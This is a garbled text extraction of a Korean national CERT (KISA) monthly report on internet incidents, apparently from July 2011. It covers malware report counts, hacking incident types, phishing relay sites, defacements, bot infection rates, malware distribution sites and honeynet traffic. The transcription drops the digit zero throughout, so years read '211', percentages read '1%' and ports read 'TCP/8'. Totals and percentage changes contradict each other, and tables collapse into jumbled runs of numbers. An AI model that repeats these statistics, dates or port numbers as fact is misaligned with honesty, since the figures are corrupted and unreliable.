본보고서내용의전부나일부를인용하는경우에는반드시출처 [ 자료 : 한국인터넷진흥원인터넷침해대응센터 ] 를명시하여주시기바랍니다.

Transcription

1 211 Vol.7 7

2 본보고서내용의전부나일부를인용하는경우에는반드시출처 [ 자료 : 한국인터넷진흥원인터넷침해대응센터 ] 를명시하여주시기바랍니다.

3 Contents 월간동향요약 : 핫이슈, 주요보안권고, 통계요약 2 1. 침해사고통계분석 침해사고증감추이 침해사고통계요약 악성코드통계현황 4 악성코드신고건수추이 주요악성코드현황 1-4. 해킹사고현황 6 해킹사고접수 처리건수추이 피해기관 운영체제별분류 피싱경유지신고처리현황 홈페이지변조사고처리현황 악성봇 (Bot) 현황 2. 침해사고위협분석 악성코드위협분석 15 허니넷에유입되는악성코드분석 악성코드유포지 / 경유지탐지및차단 바이러스월탐지악성코드정보 2-2. 국내인터넷망트래픽분석 21 프로토콜및포트추이분석 공격유형및추이분석 2-3. 허니넷트래픽분석 23 전체추이 Top 3 국가별공격유형 해외 국내 국내 국내 월간특집 (PHP 웹쉘분석및대응방안 ) 28 < 부록 > 용어정리 43

4 인터넷침해사고동향및분석월보 월간동향요약 핫이슈 Adobe Flash Player 보안취약점을악용한악성코드가사용자접속이많은사이트 ( 파일공유, 커뮤니티, 언론사, 소셜커머스등 ) 를통해지속적으로유포되고있어, 해당취약점에대한신속한보안패치및재발방지조치가요구됨 Adobe Flash Player 취약점 (CVE ) : 메모리손상에러를악용해해커가원격에서악성코드를실행할수있음 Adobe Flash Player 이하버전사용자 ( 윈도우, 매킨토시, 리눅스, 솔라리스 ) 는 버전이상으로설치하거나자동업데이트를이용하여업그레이드필요 Adobe Flash Player Download Center - 주요보안권고 MS 정기보안업데이트권고를비롯해알집 (ALZip) 취약점보안업데이트권고, 애플모바일운영체제 (ios) 취약점 보안업데이트권고등총 15 회보안공지를실시함 제목 211년 7월 MS 정기보안업데이트권고알집 (ALZip) 취약점보안업데이트권고애플모바일운영체제 (ios) 보안업데이트권고 영향받는제품 / 사용자 MS Windows 운영체제 Visio 23 Service Pack 3 알집공개용, 기업용, 공공기관용 8.21 및이전버전 애플 ios 이하버전이설치된기기 * 아이폰3GS, 아이폰4 * 아이패드, 아이패드 2 * 아이팟터치등 영향력 / 예방및대책 보안취약점 4종 [MS11-53]~[MS11-56] 패치 - 블루투스스택에서발생하는취약점으로인한원격코드실행 - 윈도우커널드라이버에서발생하는취약점으로인한권한상승 - Visio의취약점으로인한원격코드실행으로권한획득 - Windows Client/Server Run-time Subsystem 취약점으로권한상승 최신 MS 보안업데이트필요 버퍼오버플로우취약점발견 - 조작된압축파일을사용자가열어볼경우악성코드감염가능 낮은버전의알집사용자는악성코드감염에취약하므로보안업데이트필요 인증서검증취약점 (CVE ) 보안업데이트를포함한 ios 공개 최신버전으로업데이트필요 자세한내용은 KISA 인터넷침해대응센터홈페이지 ( 보안정보 보안공지 ) 참조 침해사고통계요약 악성코드신고건수는총 1,912건으로전월 (1,763건) 대비 8.5% 증가하였고, OnlineGameHack (28건), Agent(211건 ), 다수의 OnlineGameHack의변종들이많이신고됨 해킹신고처리건수는총 956건으로전월 (957 건 ) 대비.1% 감소하였으나, 스팸릴레이 (4.%) 유형을제외한다른유형은모두증가추세를보임침해사고위협분석요약 악성코드유포및경유사이트는총 1,589 건으로전월 (1,61 건 ) 대비 49.8% 증가함 - 기업유형 (1,212 건 ) 이가장많았고, 기타 (212 건 ), 비영리 (97 건 ) 등의순으로나타남 KISC 허니넷으로유입된전체유해트래픽은약 664만건으로전월 (534만건) 대비 24.3% 증가함

5 인터넷침해사고동향및분석월보 _ 침해사고통계분석 1-1. 증감추이 ( 전월대비 ) 구분 통계요약 악성코드 총 1,912건 : 전월 (1,763건) 대비 8.5% 증가 해킹신고처리 총 956건 : 전월 (957건) 대비.1% 감소 스팸릴레이 272건 : 전월 (453건) 대비 4.% 감소 피싱경유지 31건 : 전월 (22건) 대비 4.9% 증가 단순침입시도 224건 : 전월 (214건) 대비 4.7% 증가 기타해킹 245건 : 전월 (222건) 대비 1.4% 증가 홈페이지변조 184건 : 전월 (46건) 대비 3.% 증가 악성봇 (Bot) 감염율.5% : 전월 (.5%) 과동일 악성봇감염율 : 전세계악성봇감염추정 PC 대비국내감염추정 PC의비율 1-2. 침해사고통계요약 [ 표 1] 월간침해사고전체통계 구분 21 년총계 년 년총계 악성코드해킹신고처리 스팸릴레이 피싱경유지 단순침입시도 기타해킹 홈페이지변조악성봇 (Bot) 17,93 16,295 5, ,126 3,19 3,43.6% 2,92 1, % 1, % 1,566 1, % 2, % 1,786 1, % 1, % 1, % 14,129 6,854 2, ,763 1, % 211년 21년 211년 21년 211년 21년 악성코드신고접수건수 스팸릴레이신고처리건수 피싱경유지신고처리건수 211년 21년 211년 21년 211년 21년 단순침입시도 + 기타해킹신고처리홈페이지변조사고처리건수악성봇감염비율 [ 그림 1] 월별침해사고전체통계그래프

6 인터넷침해사고동향및분석월보 _ 침해사고통계분석 1-3. 악성코드통계현황 악성코드신고건수추이 7월한달간국내백신업체와 KISA에접수된악성코드신고건수는총 1,912건으로전월대비 149건 (8.5%) 이증가한것으로나타났다. [ 표 2] 월별국내악성코드신고건수 구분 21 년총계 1 월 2 월 3 월 211년 4월 5 월 6 월 7 월 합계 신고건수 17,93 2,92 1,847 1,566 2,335 1,786 1,763 1,912 14,129 국내악성코드신고건수는 KISA, 안철수연구소, 하우리가공동으로집계한결과임 이달에는 1 월 (2,92 건 ) 과 4 월 (2,335 건 ) 에이어세번째로많은신고건수를기록하였고, 앞선 2 개월간감소추세에서 반등하며증가추세로돌아섰다. [ 그림 2] 국내악성코드신고추이 ,5 3, 2,5 2, 1,5 1, 5 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 1 월 11 월 12 월 11년 7월까지월평균신고건수는 2,18 건으로, 전년도월평균 (1,494 건 ) 대비 35.1%(524 건 ) 가증가한것으로분석되었다. - 국내악성코드신고건수의추이를볼때올해악성코드신고건수가지속증가할것으로예측되므로, 사고대응및감염예방을위한주의가더욱요구된다.

7 인터넷침해사고동향및분석월보 _ 침해사고통계분석 주요악성코드현황 신고된악성코드를살펴보면, 게임계정탈취목적의 OnlineGameHack(28 건 ) 유형이가장많았고, DDoS 공격에이용되는악성코드유형인 Agent(211 건 ) 가그뒤를이었다. 이달에는특히 OnlineGameHack 과변종 (OnlineGameHack56, 55, 69) 의신고건이많아상위 5개악성코드중 4개가이에해당되었으며, 전체중 33.9%(649 건 ) 를차지하였음 [ 표 3] 최근 6 개월간국내악성코드신고건수 211 년 순위 1 월 2 월 3 월 4 월 5 월 6 월 7 월 명칭 건수 명칭건수명칭건수명칭건수명칭건수명칭건수명칭건수 1 WinSoft 72 WinSoft 336 Agent 192 WinSoft 227 Agent 26 Online GameHack 411 Online GameHack 28 2 Online GameHack 288 Online GameHack 187 WinSoft 188 Agent 22 Online GameHack 192 Agent 165 Agent ADLoad 158 Agent 125 Online GameHack 172 Online GameHack 219 WinSoft 176 Patched 98 Online GameHack Malware FakeAV ADLoad Malware ADLoad SecuRisk Injector DownLoader Malware SecuRisk WinSoft DownLoader Online GameHack 55 Online GameHack Agent 113 FakeAV 7 Malware 49 FakeAV 78 ADLoad 47 Malware 66 Malware 94 7 AUTORUN 83 Injector 57 DownLoader 48 Malware 65 Patched 46 ANTISB 52 DownLoader 8 8 OverTLS 79 XEMA 44 Injector 45 SecuRisk 65 OverTLS15 46 FakeAV 46 Patched SecuRisk DownLoader 기타합계 ,55 2,92 DownLoader OverTLS 기타합계 ,847 OverTLS15 DDoSAgent 기타합계 ,566 PatchedIMM KAZY 기타합계 ,37 2,335 XEMA FakeAV 기타합계 ,786 Injector XEMA 기타합계 ,763 WinSoft FakeAV 기타합계 ,912 그밖의상위악성코드들은전월대비 Agent(27.9%), Malware(42.4%), Downloader(17.6%) 등전체적인증가추세를보인데반해, 상반기상위권을유지했던 WinSoft 는이달에도큰폭의감소추세를이어갔다. [ 그림 3] 주요악성코드신고추이 WINSOFT ONLINEGAMEHACK AGENT MALWARE DOWNLOADER 월 2 월 3 월 4 월 5 월 6 월 7 월

8 6 인터넷침해사고동향및분석월보 _ 침해사고통계분석 1-4. 해킹사고현황 해킹사고접수 처리건수추이 7 월한달간접수 처리한해킹사고건수는총 956 건으로, 전체건수는전월 (957 건 ) 대비 1 건 (.1%) 감소하였다. [ 표 4] 해킹사고유형별접수 처리현황 구분 21 년총계 1 월 2 월 3 월 4 월 211년 5월 6 월 7 월 합계 스팸릴레이 5, ,454 피싱경유지 단순침입시도 4, ,763 기타해킹 3, ,519 홈페이지변조 3, 합계 16,295 1, , , ,854 피싱경유지 : KISA가국외의침해사고대응기관이나사칭대상이된기관, 일반사용자로부터신고받아접수 처리한건수로써실제피싱사고건수가아니라보안이취약한국내시스템이경유지로악용된건수 단순침입시도 : KISA에서접수 처리한해킹신고중악성코드등으로유발된스캔 ( 침입시도 ) 을신고한건수 기타해킹 : KISA에서접수 처리한해킹사고중스팸릴레이, 피싱경유지, 단순침입시도를제외한나머지건수 사고유형별증감추이를살펴보면, 기타해킹 (1.4%), 피싱경유지 (4.9%), 단순침입시도 (4.7%), 홈페이지변조 (3.%) 등은증가하였고, 스팸릴레이 (4.%) 만감소하였다. - 홈페이지변조가대폭증가한것은전월 (6월) 에연중최저치를기록했던영향으로판단되며, 월평균 (131 건 ) 건수를감안하면 4.5% 증가수준임 - 스팸릴레이유형은 3월부터꾸준히증가추세를이어오다가이달들어 181건 (4.%) 감소함 사고유형별비율을살펴보면, 스팸릴레이 (28.5%), 기타해킹 (25.6%), 단순침입시도 (23.4%), 홈페이지변조 (19.2%), 피싱경유지 (3.2%) 순으로나타났다. [ 그림 4] 유형별증감추이및비율 스팸릴레이 피싱경유지 단순침입시도기타해킹홈페이지변조 % 28.5% % 3.2% 1 1 월 2 월 3 월 4 월 5 월 6 월 7 월 23.4%

9 인터넷침해사고동향및분석월보 _ 침해사고통계분석 피해기관 운영체제별분류 피해기관유형별로는이달에도개인과기업유형이대부분을차지하였는데, 개인유형이 699 건으로가장많았고, 기업유형이 254 건으로그뒤를이었다. [ 표 5] 해킹사고피해기관별분류 구분 1 월 2 월 3 월 4 월 211년 5월 6 월 7 월 합계 개인 ,35 기업 ,369 대학 비영리 연구소 1 1 총계 1, , , ,854 기관분류기준 : 침해사고관련도메인이나 IP를기준으로기업 (co,com), 대학 (ac), 비영리 (or,org), 연구소 (re), 개인 (pe 또는 ISP에서제공하는유동 IP 사용자 ) 으로분류 기관유형별증감추이를살펴보면, 개인유형이전월대비 111 건증가하면서연중두번째로많은건수를기록한 반면, 기업유형은연중최저치를기록하면서 89 건감소하였고, 대학유형도 21 건감소한것으로나타났다. 유형별비율로는개인유형이 73.1% 를차지했고, 기업유형 26.6% 를차지해신고건수의 99.7% 에해당되었다. [ 그림 6] 해킹사고피해기관별분류 개인 기업 대학 비영리 연구소.3% 1, % 월 2 월 3 월 4 월 5 월 6 월 7 월 73.1%

10 인터넷침해사고동향및분석월보 _ 침해사고통계분석 운영체제별로는이달에도윈도우운영체제 (51 건 ) 가가장많았고, 리눅스운영체제 (229 건 ), 기타 (226 건 ) 의순으로나타났다. - 윈도우운영체제는 5월최고치를기록한이후최근 2개월간감소추세이며, 리눅스운영체제는전월대비 144건 (169.4%) 이증가하였음 [ 표 6] 해킹사고피해운영체제별분류 구분 1 월 2 월 3 월 4 월 211년 5월 6 월 7 월 합계 Windows ,812 Linux Solaris 기타 ,15 합계 1, , , ,854 운영체제별분류자료는각운영체제의안전성과는상관관계가없으며, 단지신고에따른분석자료임 운영체제별비율면에서는윈도우즈 (52.4%), 리눅스 (24.%), 기타유형 (23.6%) 순으로나타났다. [ 그림 7] 해킹사고피해운영체제별분류 Windows Linux Solaris 기타 1, % 23.6% 24.% 52.4% 1 월 2 월 3 월 4 월 5 월 6 월 7 월

11 9 인터넷침해사고동향및분석월보 _ 침해사고통계분석 피싱경유지신고처리현황 7 월피싱경유지신고건수는총 31 건으로, 전월대비 9 건 (4.9%) 이증가한것으로나타났으며, 소폭의증감을반복하는 추세를보이고있다. [ 표 7] 피싱경유지신고건수 구분 1 월 2 월 3 월 4 월 211 년 5 월 6 월 7 월 합계 피싱경유지신고건수 피싱 (Phishing) 경유지신고건수는 KISA 가국외의침해사고대응기관이나위장사이트의대상이된기관또는보안업체, 일반사용자로부터신고받아 처리한건수로써실제피싱으로인한피해사고건수가아니라보안이취약한국내시스템이피싱사이트경유지로악용되어신고된건수임 [ 그림 8] 피싱경유지신고추이 월 2 월 3 월 4 월 5 월 6 월 7 월 피싱대상기관유형별로는금융기관이 26 건 (83.9%) 로가장많았고, 전자상거래유형 4 건 (12.9%), 기타 1 건 (3.2%) 으로나타났다. [ 그림 9] 피싱대상기관유형별분류 [ 표 8] 피싱대상기관유형별건수 금융 전자상거래 기타 3.2% 12.9% 기관유형 ( 건수 ) 금융기관 26 전자상거래 4 기타 1 합계 %

12 1 인터넷침해사고동향및분석월보 _ 침해사고통계분석 피싱대상금융기관을살펴보면, PayPal(7 건 ) 이가장많았고, Citizens Bank(3 건 ), CAIXA(2 건 ) 등의순으로나타났으며, 기타에는 HSBC, NatWest, Bank of America, MasterCard, VISA 등 14 개금융기관이각각 1 건씩해당되었다. [ 그림 1] 피싱대상금융기관추이 PAYPAL CAIXA HSBC Nat West Citizens Bank [ 표 9] 피싱대상금융기관분류 기관명 건수 PayPal 7 Citizens Bank CAIXA 기타합계 피싱대상기관및신고건수를국가별로분류한결과, 총 6 개국 2 개기관으로집계되었고, 미국기관 (11개기관, 21건 ) 과영국기관 (5개기관 5건 ) 이사칭사고건의대부분을차지하였으며, 그밖에이탈리아, 스페인, 홍콩, 브라질등이해당되었다. [ 그림 11] 피싱대상국가추이 [ 표 1] 피싱대상국가별분류 미국 이탈리아 홍콩 영국브라질 스페인 국가미국 기관유형금융기관전자상거래 기관수 9 2 신고건수 영국이탈리아스페인홍콩브라질합계 금융기관기타금융기관금융기관금융기관금융기관

13 11 인터넷침해사고동향및분석월보 _ 침해사고통계분석 국내피싱경유지사이트의기관유형별로는기업 22 건 (7.9%), 비영리 4 건 (12.9%), 개인 / 기타 2 건 (6.5%) 순으로 집계되었다. 홈페이지가없거나 Whois 정보에 ISP 관리대역만조회되는경우인 ISP서비스이용자 유형은 3건 (9.7%) 으로나타났다. [ 그림 12] 피싱경유지사이트기관유형별추이 기업교육비영리개인 / 기타 ISP서비스이용자 [ 표 11] 피싱경유지사이트기관유형별분류 3 기관유형 건수 비율 25 기업 % 2 비영리 % 15 교육 % 월 2 월 3 월 4 월 5 월 6 월 7 월 개인 / 기타 ISP서비스이용자합계 % 9.7% 1% 피싱경유지시스템에서이용된포트는표준 HTTP 포트인 TCP/8 포트 (1%) 를사용한것으로나타났다. [ 그림 13] 피싱에이용된포트비율 TCP/8 [ 표 12] 피싱에이용된포트비율 포트 건수 ( 비율 %) TCP/8 31(1%) 합계 31( 1%) 1%

14 12 인터넷침해사고동향및분석월보 _ 침해사고통계분석 홈페이지변조사고처리현황 7월에는총 5개시스템 (IP) 의 184개사이트에서홈페이지가변조되는사고가발생하였는데, 전월대비홈페이지수는 138건 (3%) 이증가하였고, 시스템수는 19건 (61.3%) 증가하였다. - 홈페이지변조가대폭증가한것은전월 (6월) 에연중최저치를기록했던영향으로판단되며월평균 (131 건 ) 건수를감안하면 4.5% 증가수준임 [ 표 13] 홈페이지변조사고처리현황 구분 1 월 2 월 3 월 4 월 211년 5월 6 월 7 월 합계 피해홈페이지수 피해시스템수 피해시스템수는피해 IP 수를기준으로산정한것으로단일시스템에수십 ~ 수백개의홈페이지를운영하는경우도있으므로피해홈페이지수는 피해시스템수보다많음 [ 그림 14] 홈페이지변조사고추이 피해홈페이지수 피해시스템수 (IP) 월 2월 3월 4월 5월 6월 7월 - 홈페이지변조사고처리건에대한피해사이트별운영체제를분류해보면, Win 23 계열이 29 건 (3.%) 로가장 많았고, LINUX 계열 15 건 (3.%), Win 2 6 건 (12.%) 순으로나타났다. [ 그림 15] 운영체제별건수및비율 LINUX UNIX Win 2 Win 23 [ 표 14] 피해시스템운영체제별건수 3.% 운영체제 LINUX 건수 15 UNIX 58.%.% 12.% Win 23 Win 합계 5 운영체제의안정성과는상관관계가없으며, 접수처리한사고건에따른통계수치임

15 13 인터넷침해사고동향및분석월보 _ 침해사고통계분석 악성봇 (Bot) 현황 7 월전세계악성봇감염추정 PC 중국내봇감염 PC 비율은약.5% 로전월과동일하게나타났다. [ 표 15] 국내악성봇 (Bot) 감염률 구분 1 월 2 월 3 월 4 월 211 년 5 월 6 월 7 월 평균 국내비율.5%.5%.4%.4%.5%.5%.5%.47% 전세계악성봇감염추정 PC 중국내악성봇감염 PC 가차지하는비율이며웹사이트를통한전파는제외됨 봇 (Bot): 운영체제취약점, 비밀번호취약성, 악성코드의백도어등을이용하여전파되며, 명령전달사이트와의백도어연결등을통하여스팸메일 전송이나 DDoS 공격에악용가능한프로그램또는실행가능한코드 [ 그림 16] 국내악성봇감염율추이 국내악성봇감염율추이.5%.4%.3%.2%.1% % 1 월 2 월 3 월 4 월 5 월 6 월 7 월 7 월평균국내악성봇감염 IP 수는전월대비 3.% 감소하였으며, 국외악성봇은전월대비 4.9% 감소한 것으로나타났다. [ 그림 17] 국내외악성봇감염 IP 월평균추이 국내월평균 국외월평균 8, 월 2 월 3 월 4 월 5 월 6 월 7 월 7, 6, 5, 4, 3, 2, 1 월 2 월 3 월 4 월 5 월 6 월 7 월

16 14 인터넷침해사고동향및분석월보 _ 침해사고통계분석 악성봇전파에사용되는국내의주요포트순위는 TCP/445, TCP/139, TCP/1433, TCP/8 순이었으며, TCP/445 에대한공격이지속적으로이루어지는것으로나타났다. [ 그림 18] 악성봇관련국내포트추이및비율 기타 기타 % % 38.2% % 1 1 월 2 월 3 월 4 월 5 월 6 월 7 월 21.6% 국외의경우는 TCP/445, TCP/1433, TCP/8, TCP/139 순이었으며, TCP/445 에대한공격이감소한반면 TCP/1433, TCP/139 에대한공격은증가한것으로나타났다. [ 그림 19] 악성봇관련국외포트추이및비율 기타 기타 % 8.% 13.2% 38.2% 1 1 월 2월 3월 4월 5월 6월 7월 32.6% 감염된 PC 에의해악성코드전파를목적으로하는 TCP/445 포트스캔비율이계속적으로높은수준을유지 하고있는것이확인되고있다. 사용자들은최신 MS 보안패치 1) 및 PC 자동보안업데이트 2) 를활용하여외부 로부터의공격및악성코드감염예방을위한지속적인주의및관심을가져야한다. 1) 2)

17 15 인터넷침해사고동향및분석월보 _ 침해사고위협분석 2-1. 악성코드위협분석 허니넷에유입되는악성코드분석 7월에수집되었던악성코드샘플개수를분석한결과, 전체적으로전달에비해소폭증가하였으며, 이는전달에비해 Virut 계열의악성코드등다른악성코드샘플들은크게감소하였지만, Starman 등으로알려져있는변종악성코드가전월대비 44.8% 증가한것이원인으로작용하였다. 이러한결과는다양한악성코드가증가하고있는것보다는특정악성코드의활동이증가하는것으로볼수있어다양한형태의공격과피해에주의할필요가있다. Virut 악성코드 : DDoS 공격에이용되는악성코드의일종으로, 감염되면과도한트래픽을유발시켜전체네트워크속도를현저하게떨어뜨림 Starman 악성코드 : 사용자정보유출등악의적인기능을수행할수있으며네트워크의트래픽을유발시킴 [ 그림 2] 월별수집샘플추이 월별전체수집 월별신규수집 7, 6, 5, 4, 3, 2, 1, 1 월 2 월 3 월 4 월 5 월 6 월 7 월 위수집샘플은 윈도우네트워크서비스취약점 을악용하여유입된샘플의증감추이만을반영하므로이메일악성코드등다른유형의전파기법을이용하는악성코드감염활동추이동향과는무관함. 윈도우네트워크서비스란? 윈도우OS에서네트워크를통하여외부호스트를대상으로제공되는서비스 (ex. RPC, LSASS 등 ) 샘플수집은암호설정및보안업데이트를하지않고, 모든포트가열려있는전용선인터넷환경에서 Windows XP SP1(No-Patch) 과 Windows 2 SP4(No-Patch) 2개군으로분류하여수집

18 16 인터넷침해사고동향및분석월보 _ 침해사고위협분석 전체수집악성코드는소폭증가한것에반해, IRC bot계열의악성코드는전월대비 63.5% 감소하였고, Virut 계열의악성코드또한전월대비 15.9% 감소하는등백신에서검진가능한대부분의악성코드가전월에비해감소하였다. 다만, 수집한악성코드중, Starman 계열의악성코드만이전월에비해 44.8% 만증가하여 Starman 계열악성코드의유포속도가지속적으로증가하고있는것으로분석된다. [ 그림 21] 악성코드신규건수집추이 [ 그림 22] 신규수집된악성코드비율 Starman Allaple Virut IRCBot MyDoom Starman Allaple Virut IRCBot other 18, 16, 14, 12, 1,.7% 1.9% 4.1% 15.2% 6, 4, 2, 78.1% 2 월 3 월 4 월 5 월 6 월 7 월 악성코드유포국가별로살펴보면, 미국과브라질이 6 월에이어상위권을유지하고있으며, 미국, 브라질, 대만, 루마니아, 러시아등의순으로악성코드를많이유포하는것으로나타났다. [ 그림 23] 신규악성코드유포국가 US BR TW RO RU other 15.4% 1.9% 51.3% 9.9% 6.7% 5.7%

19 17 인터넷침해사고동향및분석월보 _ 침해사고위협분석 악성코드유포지 / 경유지탐지및차단조치 KISA 인터넷침해대응센터에서는홈페이지를악성코드전파의매개지로악용하여방문자PC를악성코드에감염시키는사고를예방하기위해, 약 18 만개의국내주요홈페이지를대상으로악성코드은닉여부탐지및차단등감염피해예방활동을수행하고있다. 7월한달동안탐지하여대응한악성코드유포및경유사이트는 1,589 건으로, 전월대비 49.8%(1,61 건 1,589 건 ) 증가하였다. [ 표 16] 악성코드유포지 / 경유지사고처리건수 구분 1 월 2 월 3 월 4 월 211년 5월 6 월 7 월 합계 유포지 경유지 ,98 1, ,49 7,857 합계 ,17 1,549 1,61 1,589 8,577 악성코드유포사이트수는전월대비 13.8%(78 건 18건 ) 증가하였고, 경유사이트수는전월대비 43.3% (983 건 1,49건 ) 증가한것으로나타났다. - Adobe Flash Player 관련취약점 (CVE ) 을이용한악성코드유포사이트가추가적으로많이발견되었으며, 이에따라경유사이트수도증가하였음 [ 그림 24] 악성코드유포지 / 경유지사고추이 유포지 경유지 2, 1,8 1,6 1,4 1,2 1, 월 2월 3월 4월 5월 6월 7월 - 각기관 ( 기업 ) 의웹서버관리자는 KISA 에서제작하여보급하는휘슬 (WHISTL, 웹쉘및악성코드은닉사이트 탐지프로그램 ) 과캐슬 (CASTLE, 홈페이지보안성강화도구 ) 적용등을통해반드시사전점검및재발방지대책을강구하여야한다. 참고사이트 홈페이지개발자 / 관리자를위한보안도구사이트 : 정보보호시스템관리를위한안내서. 해설서 : 자료실 관계법령 안내서. 해설서 정보보호시스템관리 - 웹서버구축보안점검안내서, 웹어플리케이션보안안내서, 홈페이지개발보안안내서등제공

20 18 인터넷침해사고동향및분석월보 _ 침해사고위협분석 피해사이트를기관유형별로분류해보면, 기업유형이 1,212 건으로가장많았고, 기타 212 건, 비영리 97 건등의 순으로나타났다. - 전월대비전체건수의증가에따라대부분의유형에서증가추세를보임 [ 표 17] 악성코드유포지 / 경유지사이트피해기관 ( 도메인 ) 별분류 구분 1 월 2 월 3 월 4 월 211년 5월 6 월 7 월 합계 기업 ,495 1, ,212 6,468 대학 비영리 연구소 네트워크 기타 ( 개인 ) 총계 ,17 1,549 1,61 1,589 8,577 기관분류기준 : 기업 (co,com), 대학 (ac), 비영리 (or,org), 연구소 (re), 네트워크 (ne,net), 기타 (pe, 국외유포지등 ) 기관유형별비율측면에서는기업 (76.3%) 로가장많았고, 기타유형이 (13.3%) 로그뒤를이었는데, 이는국외 유포지사이트탐지로인해건수가증가한것으로분석되며, 그밖에비영리 (6.1%), 네트워크 (3.8%), 대학 (.5%) 홈페이지순으로나타남 [ 그림 25] 악성코드유포지 / 경유지사이트피해기관 ( 도메인 ) 별분류 기업 대학 비영리연구소네트워크기타 ( 개인 ) 1,6 1,4 1,2 1, 8 6.5% 13.3% 3.8% 6.1% % 1 월 2 월 3 월 4 월 5 월 6 월 7 월

21 19 인터넷침해사고동향및분석월보 _ 침해사고위협분석 악성코드유포및경유지로악용된사이트를웹서버별로분류해본결과 MS IIS 웹서버가 843 건 (53.1%), Apache 웹서버가 21 건 (12.6%), 기타 545 건 (34.3%) 로순으로집계되었다. [ 표 18] 악성코드유포지 / 경유지사이트웹서버별분류 구분 1 월 2 월 3 월 4 월 211년 5월 6 월 7 월 합계 MS IIS ,216 Apache ,877 기타 ,484 합계 ,17 1,549 1,61 1,589 8,577 웹서버별구분자료는각운영체제 / 웹서버의안전성과는상관관계가없으며, 단지탐지에따른분석자료임 악성코드유포지 / 경유지사이트가이미폐쇄되어웹서버를파악하기어려운경우도기타에포함시켰음 전월대비 MS IIS 는 15.6%(729 건 843 건 ), Apache 38.6%(145 건 21 건 ), 기타 191.4%(187 건 545 건 ) 로각각증가한것으로분석된다. [ 그림 26] 악성코드유포지 / 경유지사이트웹서버별분류 MS IIS Apache 기타 1,2 1, % % 53.1% 1 월 2 월 3 월 4 월 5 월 6 월 7 월

22 2 인터넷침해사고동향및분석월보 _ 침해사고위협분석 바이러스월탐지악성코드정보 KISA 및민간업체의바이러스월을통하여탐지된악성코드를분석한결과, 7 월에도전월에이어 Virut(14.9%) 가 가장많았으며, PWS(11.6%), HLLW(1.8%), MyDoom(1.3%) 등의순으로많은비중을차지했다. 순위 합계 [ 표 19] 최근 6개월간바이러스월에서탐지한주요악성코드 211년 2월 3월 4월 5월 6월 7월 명칭 비율 명칭 비율 명칭 비율 명칭 비율 명칭 비율 명칭 비율 PWS HLLW Generic Parite HLLM Virut UPX NSAnti Psyme NTRootKit 기타 2.3% 11.4% 9.3% 9.1% 8.4% 5.3% 3.2% 2.3% 2.% 2.% 26.7% 1% PWS HLLW Generic Virut HLLM Parite Psyme Trojan ACADAP NSAnti 기타 13.1% 1.5% 1.1% 9.7% 6.7% 6.7% 5.3% 3% 2.8% 2.8% 29.4% 1.1% Generic HLLW PWS Virut HLLM Parite UPX Psyme NSAnti ACADAP 기타 14.6% 12.3% 1.1% 9.5% 6.9% 4.1% 2.9% 2.7% 2.6% 2% 32.2% 99.9 % Generic Virut HLLW PWS Parite HLLM NSANTI MyDoom Trojan MOYAM 기타 12.2% 12% 11.5% 9.6% 8.9% 5.8% 2.6% 2.4% 2% 1.9% 31.1% 1% Virut Generic HLLW PWS MyDoom HLLM Parite INOR NSAnti UPX 기타 2.9% 11% 1.4% 7.4% 5.8% 5.8% 3.9% 3.2% 2.8% 2.6% 26.3% 1.1% Virut 14.9% PWS 11.6% HLLW 1.8% MyDoom 1.3% Trojan 7.3% Generic 5.3% HLLM 4.5% Parite 3.7% NSAnti 3.3% Psyme 2% 기타 26.3% 1% 바이러스월을통해탐지한악성코드추이를살펴보면, 전월대비 PWS(4.2%) 와 MyDoom(4.5%) 이증가하였고, Virut 는 6.% 감소하여 2월이후꾸준히이어오던증가추세가이달들어감소세로돌아섰으며, Generic 은 5.7% 감소한것으로나타났다. [ 그림 27] 바이러스월을통해탐지된주요악성코드 6 개월추이 PWS HLLW Generic HLLM Virut MyDoom 25% 2% 15% 1% 5% 2 월 3 월 4 월 5 월 6 월 7 월

23 21 인터넷침해사고동향및분석월보 _ 침해사고위협분석 2-2. 국내인터넷망트래픽분석 프로토콜및포트추이분석 국내 ISP 의일부구간 ( 국내인터넷망 ) 에서수집된트래픽의포트의추이를파악한결과, 이미잘알려진 TCP/8(HTTP), TCP/88(HTTP), TCP/25(SMTP), 등이관찰되었다. [ 그림 28] 국내인터넷망에유입된포트트래픽일자별추이 TCP/8 TCP/88 TCP/25 TCP/6 TCP/443 TCP/8 을제외한 3개월간포트추이를분석한결과, TCP/88, TCP/443 포트트래픽이지속적으로발생하고있으며, TCP/25 는꾸준히증감을반복하고있으며, 그외, 특이한점은관찰되지않았다. [ 그림 29] 국내인터넷망에유입된포트트래픽 3 개월추이 TCP/88 TCP/443 TCP/51 TCP/25 TCP/6242

24 22 인터넷침해사고동향및분석월보 _ 침해사고위협분석 공격유형및추이분석 이번달국내 ISP의일부구간에서수집된공격유형을분석한결과, DDoS 공격트래픽인 TCP ACK Flooding 과 UDP Tear Drop 이가장많았으며, 실질적인공격을수행하기전에각종정보를수집하기위한 Host Sweep 스캔공격이많이탐지되었다. [ 그림 3] 국내인터넷망에유입된공격유형일자별추이 TCP ACK Flooding UDP Tear Drop Host Sweep TCP DRDOS Attack UDP Flooding 3개월간공격트래픽을분석한결과, 전월에이어 7월에도 Host Sweep과 UDP TearDrop 공격이많은것으로나타났다. 그밖에몇개월째증감을반복하던 TCP ACK Flooding 공격트래픽이 7월말급격히증가한것으로관찰되었다. [ 그림 31] 국내인터넷망에유입된공격유형 3 개월추이 Host Sweep UDP TearDrop TCP ACK Flooding UDP TearDrop(6372) TCP DRDOS Attack

25 23 인터넷침해사고동향및분석월보 _ 침해사고위협분석 2-3. 허니넷트래픽분석 전체추이 7월한달동안 KISC 허니넷에유입된전체유해트래픽은약 664만건으로전월 (534만건 ) 에비하여 24.3% 증가하였다. IP 소재별로분류한결과국내소재 IP로부터유발된트래픽은전체의약 6.9% 였으며, 해외소재 IP로부터의트래픽은약 93.1% 를차지한것으로나타났다. [ 그림 32] 최근 6 개월간허니넷유입트래픽규모 단 ( 만 ) 국내소재 IP 해외소재 IP 2 월 3 월 4 월 5 월 6 월 7 월 허니넷에유입되는트래픽은악성코드, 악성봇등에의한감염시도트래픽 ( 취약점스캔 ) 이가장많으며이러한악성코드의네트워크스캔은유효한네크워크에대한접근효율을높이기위하여, 1차적으로감염된시스템의 IP주소의 A, B클래스를고정하고 C또는 D클래스주소를변경하면서스캔하기때문에일반적으로자국에서유발된유해트래픽이해외에서유입된트래픽보다많을수있음 참고 : 허니넷으로유입되는트래픽은초당수백건이상이될수있으므로구체적인건수는큰의미가없으며, 국내외비율및월별증감을참고하기바람

